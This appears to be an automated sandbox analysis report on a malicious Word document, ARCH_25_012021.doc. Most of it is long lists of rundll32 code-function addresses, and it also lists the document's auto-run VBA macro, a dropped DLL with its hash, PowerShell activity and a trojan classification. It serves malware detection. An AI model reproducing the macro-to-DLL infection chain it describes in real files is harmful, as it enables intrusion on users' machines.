Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00249DC0 8_2_00249DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024CDCC 8_2_0024CDCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023ADCE 8_2_0023ADCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024B1D2 8_2_0024B1D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00234BDE 8_2_00234BDE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0026303C 8_2_0026303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00271E14 8_2_00271E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E502C 8_2_002E502C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EC83F 8_2_002EC83F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EC014 8_2_002EC014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E3856 8_2_002E3856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D9055 8_2_002D9055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E10BB 8_2_002E10BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E60B9 8_2_002E60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002DC0B6 8_2_002DC0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E188F 8_2_002E188F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002ED099 8_2_002ED099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E10E5 8_2_002E10E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E893D 8_2_002E893D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D6134 8_2_002D6134
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E6934 8_2_002E6934
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EA972 8_2_002EA972
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D5155 8_2_002D5155
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D4152 8_2_002D4152
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002DD1A3 8_2_002DD1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EE985 8_2_002EE985
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EB998 8_2_002EB998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002DC9C0 8_2_002DC9C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D923C 8_2_002D923C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D8217 8_2_002D8217
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D8A60 8_2_002D8A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002ED2EC 8_2_002ED2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E6AE4 8_2_002E6AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E32F0 8_2_002E32F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E72F1 8_2_002E72F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E5AC3 8_2_002E5AC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D32C2 8_2_002D32C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EE32D 8_2_002EE32D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E531E 8_2_002E531E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D2362 8_2_002D2362
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D6B79 8_2_002D6B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EC340 8_2_002EC340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D73A8 8_2_002D73A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E43BF 8_2_002E43BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D1B9C 8_2_002D1B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D0BCC 8_2_002D0BCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E7BDC 8_2_002E7BDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D542D 8_2_002D542D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D4C27 8_2_002D4C27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EBC21 8_2_002EBC21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E3C07 8_2_002E3C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002DBC63 8_2_002DBC63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002ED45C 8_2_002ED45C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002DC485 8_2_002DC485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EB499 8_2_002EB499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E04E1 8_2_002E04E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E5CDF 8_2_002E5CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E84D9 8_2_002E84D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E6D34 8_2_002E6D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D9DAD 8_2_002D9DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D9DAE 8_2_002D9DAE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E7DA5 8_2_002E7DA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D65BF 8_2_002D65BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D85B3 8_2_002D85B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D7D8A 8_2_002D7D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002DED87 8_2_002DED87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002DC587 8_2_002DC587
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002DB5F1 8_2_002DB5F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D4DCA 8_2_002D4DCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EB5C0 8_2_002EB5C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002DC652 8_2_002DC652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D16B2 8_2_002D16B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E4689 8_2_002E4689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D3E9E 8_2_002D3E9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E1ED9 8_2_002E1ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E8F18 8_2_002E8F18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002ED713 8_2_002ED713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E7F6A 8_2_002E7F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D577E 8_2_002D577E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EA746 8_2_002EA746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D3F9F 8_2_002D3F9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E8217 9_2_001E8217
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC014 9_2_001FC014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F3C07 9_2_001F3C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC83F 9_2_001FC83F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E923C 9_2_001E923C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F502C 9_2_001F502C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E542D 9_2_001E542D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E4C27 9_2_001E4C27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FBC21 9_2_001FBC21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FD45C 9_2_001FD45C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F3856 9_2_001F3856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E9055 9_2_001E9055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EC652 9_2_001EC652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EBC63 9_2_001EBC63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E8A60 9_2_001E8A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E3E9E 9_2_001E3E9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FB499 9_2_001FB499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FD099 9_2_001FD099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F188F 9_2_001F188F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F4689 9_2_001F4689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EC485 9_2_001EC485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F10BB 9_2_001F10BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F60B9 9_2_001F60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EC0B6 9_2_001EC0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E16B2 9_2_001E16B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F5CDF 9_2_001F5CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F1ED9 9_2_001F1ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F84D9 9_2_001F84D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F5AC3 9_2_001F5AC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E32C2 9_2_001E32C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F72F1 9_2_001F72F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F32F0 9_2_001F32F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FD2EC 9_2_001FD2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F10E5 9_2_001F10E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F6AE4 9_2_001F6AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F04E1 9_2_001F04E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F531E 9_2_001F531E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F8F18 9_2_001F8F18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FD713 9_2_001FD713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F893D 9_2_001F893D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E6134 9_2_001E6134
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F6D34 9_2_001F6D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F6934 9_2_001F6934
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FE32D 9_2_001FE32D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E5155 9_2_001E5155
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E4152 9_2_001E4152
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FA746 9_2_001FA746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC340 9_2_001FC340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E577E 9_2_001E577E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E6B79 9_2_001E6B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FA972 9_2_001FA972
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F7F6A 9_2_001F7F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E2362 9_2_001E2362
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E3F9F 9_2_001E3F9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E1B9C 9_2_001E1B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FB998 9_2_001FB998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E7D8A 9_2_001E7D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EED87 9_2_001EED87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EC587 9_2_001EC587
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FE985 9_2_001FE985
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F43BF 9_2_001F43BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E65BF 9_2_001E65BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E85B3 9_2_001E85B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E9DAE 9_2_001E9DAE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E9DAD 9_2_001E9DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E73A8 9_2_001E73A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F7DA5 9_2_001F7DA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001ED1A3 9_2_001ED1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F7BDC 9_2_001F7BDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E0BCC 9_2_001E0BCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E4DCA 9_2_001E4DCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EC9C0 9_2_001EC9C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FB5C0 9_2_001FB5C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001EB5F1 9_2_001EB5F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC014 10_2_001DC014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C8217 10_2_001C8217
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D3C07 10_2_001D3C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C923C 10_2_001C923C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC83F 10_2_001DC83F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D502C 10_2_001D502C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C542D 10_2_001C542D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4C27 10_2_001C4C27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DBC21 10_2_001DBC21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DD45C 10_2_001DD45C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9055 10_2_001C9055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D3856 10_2_001D3856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CC652 10_2_001CC652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C8A60 10_2_001C8A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CBC63 10_2_001CBC63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C3E9E 10_2_001C3E9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DB499 10_2_001DB499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DD099 10_2_001DD099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D188F 10_2_001D188F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D4689 10_2_001D4689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CC485 10_2_001CC485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D60B9 10_2_001D60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D10BB 10_2_001D10BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CC0B6 10_2_001CC0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C16B2 10_2_001C16B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D5CDF 10_2_001D5CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D1ED9 10_2_001D1ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D84D9 10_2_001D84D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D5AC3 10_2_001D5AC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C32C2 10_2_001C32C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D72F1 10_2_001D72F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D32F0 10_2_001D32F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DD2EC 10_2_001DD2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D10E5 10_2_001D10E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6AE4 10_2_001D6AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D04E1 10_2_001D04E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D531E 10_2_001D531E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D8F18 10_2_001D8F18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DD713 10_2_001DD713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D893D 10_2_001D893D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C6134 10_2_001C6134
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6D34 10_2_001D6D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D6934 10_2_001D6934
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DE32D 10_2_001DE32D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C5155 10_2_001C5155
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4152 10_2_001C4152
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DA746 10_2_001DA746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DC340 10_2_001DC340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C577E 10_2_001C577E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C6B79 10_2_001C6B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DA972 10_2_001DA972
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7F6A 10_2_001D7F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C2362 10_2_001C2362
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C1B9C 10_2_001C1B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C3F9F 10_2_001C3F9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DB998 10_2_001DB998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C7D8A 10_2_001C7D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DE985 10_2_001DE985
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CED87 10_2_001CED87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CC587 10_2_001CC587
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D43BF 10_2_001D43BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C65BF 10_2_001C65BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C85B3 10_2_001C85B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9DAD 10_2_001C9DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C9DAE 10_2_001C9DAE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C73A8 10_2_001C73A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7DA5 10_2_001D7DA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CD1A3 10_2_001CD1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001D7BDC 10_2_001D7BDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C0BCC 10_2_001C0BCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C4DCA 10_2_001C4DCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CC9C0 10_2_001CC9C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001DB5C0 10_2_001DB5C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001CB5F1 10_2_001CB5F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023BC21 11_2_0023BC21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00224C27 11_2_00224C27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023502C 11_2_0023502C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022542D 11_2_0022542D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023C83F 11_2_0023C83F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022923C 11_2_0022923C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00233C07 11_2_00233C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00228217 11_2_00228217
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023C014 11_2_0023C014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022BC63 11_2_0022BC63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00228A60 11_2_00228A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022C652 11_2_0022C652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00233856 11_2_00233856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00229055 11_2_00229055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023D45C 11_2_0023D45C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002216B2 11_2_002216B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022C0B6 11_2_0022C0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002310BB 11_2_002310BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002360B9 11_2_002360B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0022C485 11_2_0022C485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00234689 11_2_00234689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023188F 11_2_0023188F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023B499 11_2_0023B499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023D099 11_2_0023D099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00223E9E 11_2_00223E9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002304E1 11_2_002304E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002310E5 11_2_002310E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00236AE4 11_2_00236AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023D2EC 11_2_0023D2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002372F1 11_2_002372F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002332F0 11_2_002332F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00235AC3 11_2_00235AC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002232C2 11_2_002232C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00231ED9 11_2_00231ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002384D9 11_2_002384D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00235CDF 11_2_00235CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0023E32D 11_2_0023E32D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00226134 11_2_00226134
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: ARCH_25_012021.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: ARCH_25_012021.doc OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Kaktksw\An6othh\N49I.dll D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
PE file contains strange resources
Source: N49I.dll.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@24/8@1/98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_007434DF CreateToolhelp32Snapshot, 14_2_007434DF
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$CH_25_012021.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC503.tmp Jump to behavior
Source: ARCH_25_012021.doc OLE indicator, Word Document stream: true
Source: ARCH_25_012021.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ..%..................................... .........................(.....8.(.............#.........................%.....h.......5kU.......(..... Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ................T...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......x.(.....L.................(..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K......x.]............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j......................u.............}..v....P3......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... u...............u.............}..v.....3......0...............x.].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....................#..j......................u.............}..v.....@......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................#..j....X.]...............u.............}..v....@A......0.................].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....#...............s..j......................u.............}..v.....w......0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............s..j..... u...............u.............}..v.....x......0...............(.].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....7................/.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7................/.j......................u.............}..v....(.......0................F].............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....C................/.j....@I]...............u.............}..v............0.................%.............T............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C................/.j......................u.............}..v....(.......0................F].............T............... Jump to behavior
